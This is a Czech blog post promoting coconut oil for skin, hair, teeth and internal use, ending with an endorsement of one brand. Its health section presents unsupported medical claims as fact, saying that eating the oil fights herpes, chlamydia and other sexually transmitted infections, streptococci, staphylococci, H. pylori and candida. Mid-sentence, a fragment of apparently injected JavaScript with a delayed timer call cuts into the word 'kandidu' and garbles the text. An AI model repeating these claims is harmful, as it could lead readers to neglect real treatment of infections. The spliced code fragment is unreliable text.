Zázrak jménem kokosový olej

Google+ Pinterest LinkedIn Tumblr +

Pokožka den co den podstupuje zatěžkávací zkoušku – změny počasí, stres, umělá vlákna prádla a nešetrná kosmetika, to jsou faktory, které jí nepropsívají. Předtím, než poběžíte do obchodu pro luxusní sérum, poohlédněte se po zázracích, které pro nás přichystala příroda. Jedním z nich je kokosový olej. Ten panenský, za studena lisovaný…

  • Kokosový olej vyživuje. Je jedno, máte-li pokožku vysušenou, mastnou nebo extrémně citlivou. Kokosový olej nedráždí a můžete jej bez obav používat každý den. A třeba i několikrát denně! Obsahuje vitamin E, známý jako elixír mládí a krásy.
  • Kokosový olej je multifunkční. Mažte jím pleť obličeje, krku, dekoltu, suchá místa, jako jsou lokty, kolena, pomažte jím vysušené rty, vyleštěte s ním zuby, vetřete jej do vlasů…
  • Kokosový olej léčí! Bez obav jej konzumujte, přidávejte do studených i teplých jídel, jezte jen tak po lžičkách. Kyselina laurová, z níž je tvořeno 50 % kokosového oleje, ničí zlé bakterie, aniž by poškozovala střevní mikroflóru. Další z kyselin, tentokrát kyselina kaprová a kaprylová, se osvědičly v boji proti herpes viru, chlamydiím a dalším bakteriím, způsobujícím pohlavně přenosné choroby. Poradí si také se streptokoky, stafylokoky, Helicobacter pylori a likvidují kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidu ve střevním i gynekologickém ústrojí. Paráda, že?

Já kokosový olej na tělo nanáším večer před spaním a ráno si dám sprchu, protože má tendnenci na pokožce jakoby „žluknout“ a ne kažédmu může být vzniké aroma příjemné. A když se mi zrovna nechce použít jej na tělo, mám i jiná esa v rukávu :).

  • Kokosová kúra na vlasy opravdu funguje! Zabrání třepení konečnků, vyživí délky vlasů a šetrně pečuje o citlivou pokožku hlavy. Před mytím vlasů vetřete pár kapek oleje do délek vlasů a klidně jím proveďte i masáž hlavy. Zabalte vlasy do folie a do ručníku a nechte působit alespoň 30 minut až hodinu. Poté vlasy důkladně umyjte přírodním šamponem (teplou vodou, nikoli studenou nebo vlažnou, vlasy by pak zůstaly mastné).
  • Kokosová zubní péče je fantastická! Čistit zuby olejem zní sice jako nepovedený žert, nicméně tuto techniku používali už naši dávní předkové. Zaprvé proto, že neznali zubní kartáček ani pastu, a zadruhé proto, že si byli dobře vědomi blahodárných účinků přírodních olejů. Nechte se jimi inspirovat a klasické čištění zubů střídejte s olejovou masáží. Naberte trochu kokosového oleje na prst nebo klidně na jemný zubní kartáček a jemně jím masírujte jak zuby, tak dásně. Kokosový olej bělí zuby, posiluje dásně, v ústní dutině působí antisepticky, likviduje zápach z úst a posiluje zubní sklovinu.

Kdo nevěří, nechť vyzkouší. Já mám kokosové oleje dva: jeden v kosmetické tašce a další v kuchyni. Používám nejraději kokosový olej od Purity Vision a střídám klasický a ten bez parfemace. Oba jsou fantastické a dobře dostupné: seženete je v každé DM drogerii a za bezva cenu!

 

 Sdílet.

O autorovi

Zanechte odpověď